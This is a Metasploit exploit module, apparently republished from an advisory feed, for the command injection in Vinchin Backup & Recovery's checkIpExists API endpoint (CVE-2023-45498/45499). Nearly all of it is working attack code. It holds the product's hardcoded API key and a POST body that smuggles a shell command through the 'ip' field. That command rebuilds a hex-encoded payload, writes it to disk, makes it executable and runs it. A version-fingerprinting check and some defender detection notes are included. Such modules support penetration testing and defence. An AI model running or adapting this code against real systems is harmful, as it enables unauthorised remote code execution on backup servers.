Headline
Vinchin Backup And Recovery Command Injection
This Metasploit module exploits a command injection vulnerability in Vinchin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the checkIpExists API endpoint, an attacker can execute arbitrary commands as the web server user.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the Vinchin Backup & Recovery `checkIpExists` command
# injection (CVE-2023-45498, CVE-2023-45499). The vulnerable endpoint is
# reached via `api/?m=30&f=checkIpExists&k=<APIKEY>` with a POST body of the
# form `p={"ip":...}`; the `ip` value is passed to a shell without
# sufficient validation. Side effects are tagged IOC_IN_LOGS: the request
# (including the fixed API key in the query string) and the temporary file
# written under FETCH_WRITABLE_DIR are the observable artefacts.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # NOTE(review): CmdStager is mixed in, but `exploit` below does not call
  # execute_cmdstager; the payload is delivered inline via `echo -e`.
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and user-configurable options.
  #
  # @param info [Hash] module info merged by update_info
  #
  # Options:
  # - TARGETURI: base path of the web application (default '/')
  # - APIKEY: the fixed API key the product ships with (per the option
  #   description); it is sent as the `k` query parameter
  # - FETCH_WRITABLE_DIR (DefaultOptions): directory on the target where the
  #   temporary payload file is written; defaults to the nginx/vinchin tmp dir
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Vinchin Backup and Recovery Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability in Vinchin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the checkIpExists API endpoint, an attacker can execute arbitrary commands as the web server user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Gregory Boddin (LeakIX)', # Vulnerability discovery
          'Valentin Lobstein' # Metasploit module
        ],
        'References' => [
          ['CVE', '2023-45498'],
          ['CVE', '2023-45499'],
          ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],
          ['URL', 'https://vinchin.com/'] # Vendor URL
        ],
        'DisclosureDate' => '2023-10-26',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'AKA' => ['Vinchin Command Injection']
        },
        'Platform' => ['linux', 'unix'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          ['Automatic', {}]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true,
          'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp'
        },
        'Privileged' => false
      )
    )
    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']),
        OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),
      ]
    )
  end

  # Deliver the payload through the injectable `ip` field.
  #
  # The encoded payload is hex-encoded and rebuilt on the target with
  # `echo -e`, written to a random 8-character file under FETCH_WRITABLE_DIR,
  # made executable, run, then deleted. The HTTP response from
  # send_request_cgi is not inspected, so a failed injection is not
  # reported here; presumably success is only observable via the resulting
  # session (ARCH_CMD payload).
  #
  # Detection notes for defenders: a POST to `api/` with query parameters
  # `m=30&f=checkIpExists` whose body contains `a||` followed by shell
  # metacharacters, and short-lived files appearing in FETCH_WRITABLE_DIR.
  def exploit
    hex_encoded_payload = payload.encoded.unpack('H*').first
    # Each byte becomes `\\xNN`; the doubled backslash survives the JSON
    # string so the shell's `echo -e` sees `\xNN`.
    formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join
    temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"
    command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}"
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['TARGETURI'], 'api/'),
      'vars_get' => {
        'm' => '30',
        'f' => 'checkIpExists',
        'k' => datastore['APIKEY']
      },
      # The JSON body is built by string interpolation; `a||` terminates the
      # intended argument so the injected command runs regardless of what
      # the first command does.
      'data' => "p={\"ip\":\"a||#{command}\"}"
    })
  end

  # Fingerprint the target by scraping the build number from login.php.
  #
  # @return [CheckCode] Unknown if the page cannot be fetched, returns a
  #   non-200 status, or carries no `Vinchin build: a.b.c.d` marker;
  #   Appears for 5.0.x, 6.0.x, 6.7.x and 7.0.0-7.0.1; Safe otherwise.
  #
  # NOTE(review): the module description lists v7.0.* as affected, but this
  # check only flags versions below 7.0.2 — confirm which is intended.
  def check
    target_uri_path = normalize_uri(target_uri.path, 'login.php')
    res = send_request_cgi('uri' => target_uri_path)
    return CheckCode::Unknown('Failed to connect to the target.') unless res
    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200

    version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/
    version_match = res.body.match(version_pattern)
    unless version_match && version_match[1]
      return CheckCode::Unknown('Unable to extract version.')
    end

    version = Rex::Version.new(version_match[1])
    print_status("Detected Vinchin version: #{version}")
    # Half-open ranges: lower bound inclusive, upper bound exclusive.
    if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||
       (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||
       (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||
       (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))
      return CheckCode::Appears
    else
      return CheckCode::Safe
    end
  end
end